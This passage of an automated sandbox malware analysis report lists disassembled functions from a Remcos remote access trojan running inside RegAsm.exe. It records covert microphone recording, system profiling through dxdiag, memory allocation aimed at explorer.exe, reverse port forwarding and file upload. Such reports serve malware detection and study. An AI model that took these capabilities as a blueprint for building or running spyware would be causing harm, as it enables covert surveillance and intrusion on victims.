                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                    • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                  • _free.LIBCMT ref: 00448203
                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Eventinet_ntoa
                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                  • API String ID: 3578746661-3604713145
                                                                                  • Opcode ID: ea8ca31510535c70747e6f45e0e279032a2269eba889b1775bc8ebb2cb1012fb
                                                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                  • Opcode Fuzzy Hash: ea8ca31510535c70747e6f45e0e279032a2269eba889b1775bc8ebb2cb1012fb
                                                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                  APIs
                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DecodePointer
                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                  • API String ID: 3527080286-3064271455
                                                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                  • API String ID: 1462127192-2001430897
                                                                                  • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                  • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess
                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                  • API String ID: 2050909247-4242073005
                                                                                  • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                  • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                  APIs
                                                                                  • _strftime.LIBCMT ref: 00401D50
                                                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                  • API String ID: 3809562944-243156785
                                                                                  • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                  • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                  • int.LIBCPMT ref: 00410EBC
                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                  • String ID: ,kG$0kG
                                                                                  • API String ID: 3815856325-2015055088
                                                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                  • waveInStart.WINMM ref: 00401CFE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                  • String ID: dMG$|MG$PG
                                                                                  • API String ID: 1356121797-532278878
                                                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                  • String ID: Remcos
                                                                                  • API String ID: 1970332568-165870891
                                                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                  • __freea.LIBCMT ref: 00454083
                                                                                  • __freea.LIBCMT ref: 0045408F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                  • String ID:
                                                                                  • API String ID: 201697637-0
                                                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 1454806937-0
                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                  • _free.LIBCMT ref: 00445515
                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                  • _free.LIBCMT ref: 00445560
                                                                                  • _free.LIBCMT ref: 00445569
                                                                                  • _free.LIBCMT ref: 00445575
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                  • String ID: C
                                                                                  • API String ID: 1679612858-1037565863
                                                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tcp$udp
                                                                                  • API String ID: 0-3725065008
                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                  • String ID: PkG$XMG$NG$NG
                                                                                  • API String ID: 1649129571-3151166067
                                                                                  • Opcode ID: 45d1540e55659fb94907c6c7d02f3ccfc670a167c10d2f2802d27dad66905ff8
                                                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                  • Opcode Fuzzy Hash: 45d1540e55659fb94907c6c7d02f3ccfc670a167c10d2f2802d27dad66905ff8
                                                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                  • String ID: .part
                                                                                  • API String ID: 1303771098-3499674018
                                                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                  APIs
                                                                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
